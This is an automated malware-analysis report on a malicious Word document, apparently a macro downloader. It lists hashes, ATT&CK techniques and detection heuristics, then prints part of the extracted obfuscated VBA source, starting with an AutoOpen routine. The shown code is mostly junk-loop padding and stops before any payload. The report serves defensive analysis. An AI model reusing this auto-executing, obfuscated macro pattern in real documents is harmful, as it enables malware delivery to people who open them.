Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 fbe0c27f2661b6cc…

MALICIOUS

Office (OLE)

154.8 KB Created: 2019-04-11 14:13:00 Authoring application: Microsoft Office Word First seen: 2019-05-31
MD5: 37a2072d4df17f299c3de2d666a0e80e SHA-1: 1baf8f48ce7463301866554424c5ca2f3e4d6191 SHA-256: fbe0c27f2661b6cc753d23d5ddcad207415bc235e426acc21ec07593c5551925
282 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1137.001 Office Application Startup: Office Test Scripts

The sample contains VBA macros with an autoopen subroutine, a common technique for executing malicious code upon document opening. Heuristics indicate the use of WMI to launch processes, suggesting the macro is designed to download and execute a secondary payload. The obfuscated nature of the VBA code prevents a more detailed analysis of its specific actions.

Heuristics 8

  • ClamAV: Doc.Malware.00536d-6937584-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.00536d-6937584-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 38923 bytes
SHA-256: 87a21b2626eed3b43c3d81d457e96746ed9034c71f22ec4d01c3497f64219841
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Z4AxBUc"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "jx4Zc_U"
Attribute VB_Base = "0{103C49B8-CDD4-4761-8662-1EFAF30F852B}{FE5D26C4-8E51-4B39-AC38-D33FFB7A4504}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "wAAGUck"
Attribute VB_Base = "0{53B6AC09-460C-4DD2-9130-82F9FDFEB4A9}{00D347EF-3C70-4BB3-853B-FD2C9D3A214A}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "QAkGXwQ"
Sub autoopen()
   If EQ_UQ_C = Nk4wAA Then
  Do While jAUBD_QB And IABDX_D
      While OABA4U And 64732849
         oAAAA4k = Asc(950034646 / Oct(531804896))
      Wend
      For RCBAcAZU = 172177485 To 951924674
         wcADAA = 99237868
      Next
      Set wkAUBQ = wwCQAU
      If hGAoGDA Eqv 642833417 Then
         h_QAAAkC = CDate(ZwUAAAXU)
      End If
      While I1_AUA1 < dGAC4oA
         EZAo1ZBA = (IZAU_kA)
Wend
   Loop
End If
   If OQ1BQAAA = cGGAZZ Then
  Do While ocAAGD And kAUA4A
      While jUZQAk And 887881186
         ADAAkXoG = Asc(597044215 / Oct(411318129))
      Wend
      For sBX4UAUo = 372831526 To 729711231
         bckcG_A = 78672383
      Next
      Set iAZcBwQD = WDQQAX
      If IX11wkA Eqv 118078820 Then
         AAQQCDXA = CDate(I_DcADX)
      End If
      While iGZkAA < UQUA_AA
         NAAUDoAo = (s1QAAZA_)
Wend
   Loop
End If
p_1DGA
   If JkUBC1x = dU1kAZA Then
  Do While M1D1BU_ And UAACAAGU
      While bAUAkDA And 984689681
         wAUAZkX = Asc(334995197 / Oct(897233447))
      Wend
      For FXDAAA = 602540804 To 964581166
         nwA1kBQ = 941713516
      Next
      Set VxwCBAc_ = RZcxAk
      If qAAxZk Eqv 224799144 Then
         SU1AUCZ = CDate(wUAAAA)
      End If
      While EAAoBcAA < RUQDUc
         EAQCQZD = (hAQA1G)
Wend
   Loop
End If
   If v14QxBA = NkAGoC_D Then
  Do While MC_AUwG And WB4QkZ
      While AUkk_QA And 609792284
         IUc_AABU = Asc(421335260 / Oct(437109608))
      Wend
      For dAckDk = 660095315 To 340121662
         mZ_GoA = 758445518
      Next
      Set KX_QwwCU = lAUcABAA
      If jCoDcA Eqv 487373023 Then
         vBAcUAxD = CDate(uUUBUcDA)
      End If
      While qDkU1kA < cBAC4oD
         zAAAxU = (uD_Do4cD)
Wend
   Loop
End If
   If SXGUAD = uAZAB1 Then
  Do While a4DAAA4B And JoAkAAQC
      While hAXUUAwU And 534573086
         aAZoUAo = Asc(669997128 / Oct(709023313))
      Wend
      For qAABUQUA = 514942717 To 603920911
         S_UUkxU = 912727991
      Next
      Set TGAAwAAG = GBwAQk
      If zDAAAck Eqv 427663115 Then
         oA1A_xo = CDate(tBQABA)
      End If
      While bw_4c1C < b_AAGA
         uAx_DwAQ = (uXCA41Z4)
Wend
   Loop
End If
End Sub

Attribute VB_Name = "LU4xGUA"
Function p_1DGA()
On Error Resume Next
   If XAAcAADG = dAAAx_ Then
  Do While V4xQAX4X And RAXCADAw
      While MokoBZ And 148684133
         zAADAAQA = Asc(665758444 / Oct(655490864))
      Wend
      For X4XAUD4 = 723080684 To 878588818
         LAQQZkAA = 31076117
      Next
      Set EAx1DA = jBAoQ1A
      If VQAAoAk Eqv 543730137 Then
         PQAACU = CDate(GAkU_4A)
      End If
      While wCAAB4 < ZDXwxo
         sBGCG1 = (mQXDUDA)
Wend
   Loop
End If
   If uc1_kDQ = IcABABCU Then
  Do While nAwA_BAQ And ikQAXG
      While PcA1XQZk And 771568086
         tUAQDU = Asc(934442094 / Oct(684405984))
      Wend
      For fAA_QDAA = 133477167 To 381864372
         CUwA_AA1 = 354283342
      Next
      Set RXUADAXA = DGXABUU
      If hXADGAQ Eqv 358754312 Then
       
... (truncated)